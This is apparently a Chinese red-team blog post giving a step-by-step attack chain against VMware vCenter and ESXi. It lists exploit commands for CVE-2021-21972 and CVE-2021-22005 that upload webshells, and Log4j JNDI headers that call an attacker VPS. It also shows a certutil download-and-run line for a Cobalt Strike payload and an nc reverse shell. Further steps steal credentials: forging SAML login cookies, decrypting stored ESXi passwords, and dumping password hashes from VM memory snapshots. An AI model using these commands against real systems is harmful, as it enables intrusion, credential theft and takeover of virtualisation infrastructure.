Vcenter实战利用方式总结

在内网渗透中常常会碰到VmwareVcenter,对实战打法以及碰到的坑点做了一些总结,部分内容参考了师傅们提供的宝贵经验,衷心感谢各位师傅

0x01 指纹特征

  1. title="+ ID_VC_Welcome +"

image.png

0x02 查看Vcenter版本

  1. /sdk/vimServiceVersions.xml

image-20220902150355359.png

0x03 CVE-2021-21972

影响范围

  • vCenter Server7.0 < 7.0.U1c
  • vCenter Server6.7 < 6.7.U3l
  • vCenter Server6.5 < 6.5.U3n
  1. /ui/vropspluginui/rest/services/uploadova

访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞

image-20220724170308995.png
windows机器:

漏洞利用: https://github.com/horizon3ai/CVE-2021-21972

  1. python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp
  2. -t (目标地址)
  3. -f (上传的文件)
  4. -p (上传后的webshell路径,默认不用改)

image-20220724170308995.png
上传后的路径为

  1. https://x.x.x.x/statsreport/gsl.jsp

完整路径为

  1. C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

image-20220813172742556.png
Linux机器:

1、写公私钥(需要22端口开放)

  1. python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub

2、遍历写shell(时间较久)

https://github.com/NS-Sp4ce/CVE-2021-21972

image-20220829190235482.png

0x04 CVE-2021-22005

影响范围

  • vCenter Server 7.0 < 7.0 U2c build-18356314
  • vCenter Server 6.7 < 6.7 U3o build-18485166
  • Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
  • Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
  • 6.7 vCenters Windows版本不受影响

漏洞利用

https://github.com/r0ckysec/CVE-2021-22005

  1. cve-2021-22005_exp_win.exe -u https://x.x.x.x --shell

image-20220813184455354.png

https://github.com/rwincey/CVE-2021-22005/blob/main/CVE-2021-22005.py

  1. python cve-2021-22005.py -t https://x.x.x.x

image-20220813190026044.png

连接webshell

  1. https://x.x.x.x/idm/..;/test.jsp

image-20220813185938630.png

上传后的webshell完整路径为

  1. /usr/lib/vmware-sso/vmware-sts/webapps/ROOT/xx.jsp

0x05 CVE-2021-44228

利用log4j漏洞,漏洞触发点为XFF头部

  1. GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
  2. Host: 192.168.121.137
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Dnt: 1
  8. X-Forwarded-For: ${jndi:ldap://9qphlt.dnslog.cn}
  9. Upgrade-Insecure-Requests: 1
  10. Sec-Fetch-Dest: document
  11. Sec-Fetch-Mode: navigate
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-User: ?1
  14. Te: trailers
  15. Connection: close

DNSlog探测漏洞是否存在

  1. X-Forwarded-For: ${jndi:ldap://9qphlt.dnslog.cn}

image-20220902150833322.png

使用 JNDIExploit 工具,-u 查看可执行命令

image-20220902152302899.png

漏洞利用:

  1. java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSIP
  2. X-Forwarded-For: ${jndi:ldap://VPSIP:1389/TomcatBypass/TomcatEcho}
  3. cmd:

image-20220902152705873.png
image-20220902151954111.png

cs上线

  1. GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
  2. Host: 192.168.121.142
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Dnt: 1
  8. cmd: certutil -urlcache -split -f http://VPS C:\Users\Public\1.exe &amp;&amp; C:\Users\Public\1.exe
  9. X-Forwarded-For: ${jndi:ldap://VPS:1389/TomcatBypass/TomcatEcho}
  10. Upgrade-Insecure-Requests: 1
  11. Sec-Fetch-Dest: document
  12. Sec-Fetch-Mode: navigate
  13. Sec-Fetch-Site: none
  14. Sec-Fetch-User: ?1
  15. Te: trailers
  16. Connection: close

image-20220902155509783.png

Linux使用反弹shell命令

  1. nc -e /bin/sh 10.10.10.10 8888
  2. nc -lvp 8888

弹回来若是非交互式shell没有回显,使用以下命令切换为交互式

  1. python3 -c 'import pty;pty.spawn("/bin/bash")'
  2. python -c 'import pty;pty.spawn("/bin/bash")'

image-20220902161936653.png

0x06 获取vcenter-web控制台权限

重置密码

比较快的一种方法,但是修改之后无法获取原来的密码,管理员会发现密码被改

选择 3 选项,输入默认 administrator@vsphere.local (需要管理员权限)

  1. #Linux
  2. /usr/lib/vmware-vmdir/bin/vdcadmintool
  3. #Windows
  4. C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe

image-20220829144257277.png

通过解密数据库登录获取cookie,再用cookie登录web

解密脚本:https://github.com/horizon3ai/vcenter_saml_login

  1. python vcenter_saml_login.py -p data.mdb -t 10.9.16.11

然后会生成相应的cookie,访问 ui 路径进行 cookie 替换即可

  1. #Linux
  2. /storage/db/vmware-vmdir/data.mdb
  3. #windows
  4. C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

image-20220824120811883.png
使用小饼干替换cookie,成功登录
image-20220824134338223.png
windows运行脚本需要安装对应版本的python-ldap

  1. https://www.lfd.uci.edu/~gohlke/pythonlibs/#python-ldap1
  2. pip install python_ldap-3.4.0-cp38-cp38-win_amd64.whl
  3. pip install -r requirements.txt

image-20220824120857075.png
image-20220824120622726.png
实际测试过程中发现windows的data.mdb文件过大,拉回来不是那么方便,适合Linux机器

image-20220824114156587.png
这时候如果目标机器上装有python环境,可使用3gstudent师傅的脚本进行利用

https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_ExtraCertFromMdb.py

  1. python vCenter_ExtraCertFromMdb.py data.mdb

image-20220829120100199.png

运行脚本会生成三段证书文件,放置到相应的位置

https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_GenerateLoginCookie.py

  1. python vCenter_GenerateLoginCookie.py 192.168.121.135 192.168.121.135 vsphere.local idp_cert.txt trusted_cert_1.txt trusted_cert_2.txt

image-20220829142148838.png

不重置获取密码(ESXI)

查看域

  1. #Linux
  2. /usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost
  3. #windows
  4. C:\Program Files\VMware\vCenter Server\vmafdd\vmafd-cli get-domain-name --server-name localhost
  5. C:\PROGRA~1\VMware\"vCenter Server"\vmafdd\vmafd-cli get-domain-name --server-name localhost

坑点:由于路径中间存在空格,导致识别不了

image-20220815103945952.png
解决方法:使用双引号对含有空格的路径进行单独处理

image-20220815104048896.png

1、获取解密key

  1. #Windows
  2. type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
  3. #Linux
  4. cat /etc/vmware-vpx/ssl/symkey.dat

image-20220813161905824.png

2、获取数据库账号密码

vcenter默认数据库文件存放在vcdb.properties,配置文件中有数据库的明文账号密码

  1. #Linux
  2. cat /etc/vmware-vpx/vcdb.properties
  3. cat /etc/vmware/service-state/vpxd/vcdb.properties
  4. #Windows
  5. type C:\ProgramData\VMware\"VMware VirtualCenter"\vcdb.properties
  6. type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

image-20220813184742819.png

image-20220813191535308.png

默认是postgresql数据库,只能在vCenter服务器本地登录,执行语句查询ESXI的密码

  1. #psql默认存放位置
  2. Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
  3. Linux: /opt/vmware/vpostgres/9.3/bin/psql
  4. #执行语句查询
  5. psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
  6. #执行完会输出一段加密字段
  7. Command> shell psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
  8. Shell access is granted to root
  9. Password for user vc:
  10. ip_address | user_name | password
  11. -------------+-----------+---------------------------------------------------------------------------------------
  12. 192.168.1.1 | vpxuser | *H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==
  13. 192.168.1.2 | vpxuser | *zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==
  14. 192.168.1.3 | vpxuser | *Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==
  15. 192.168.1.4 | vpxuser | *R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==
  16. (4 rows)
  17. #只保留password字段
  18. *H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==
  19. *zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==
  20. *Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==
  21. *R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==

在实际情况中也碰到使用 MSSQL 数据库的情况,这时候直接使用 navicat 进行连接,搜索 VPX_HOST

image-20220815144326190.png

image-20220815141131592.png

3、使用脚本解密

https://github.com/shmilylty/vhost_password_decrypt

  • password字段放到password.enc里面
  • symkey.dat为第一步获取的解密key

image-20220815134235378.png

  1. python decrypt.py symkey.dat password.enc password.txt

执行脚本后,会输出一个password.txt,里面存放着对应 ip_address 的 ESXI 机器密码

4、登录ESXI

在 ESXI 机器地址后面添加 /ui ,访问web控制台,账密为 vpxuser/password.txt里的密码

image-20220815132316991.png

image-20220815135054173.png
解密出来的密码除了可以登录web控制台以外还可以ssh登录机器,不过需要服务里开启 SSH 安全shell

image-20220815143721321.png

image-20220824135257496.png

0x07 获取虚拟机权限

登录web控制台后,想要获取某个虚拟机的权限,比如说目标系统为靶标

选择目标虚拟机,操作生成快照

image-20220901170459802.png
到数据存储位置找到相应的快照文件

image-20220901150507397.png
也可以通过 ssh 登录ESXI服务器上,通过 find 找出相应的 vmemvmsn 文件拷贝到本地

  1. find / -name "*.vmem"

image-20220901163008934.png
https://www.volatilityfoundation.org/releases

使用 volatility 工具查看 profile

  1. volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem imageinfo

image-20220901165506218.png
读取注册表

  1. volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem --profile=Win7SP1x64 hivelist

image-20220901170657774.png
获取hash并解出密码

  1. volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem --profile=Win7SP1x64 hashdump -y 0xfffff8a000024010 -s 0xfffff8a00084c010

image-20220901170740133.png

image-20220901155122168.png

  • 发表于 2022-09-16 09:32:51
  • 阅读 ( 33889 )
  • 分类:内网渗透

4 条评论

hyyrent
hyyrent

红队摸鱼选手

7 篇文章

站长统计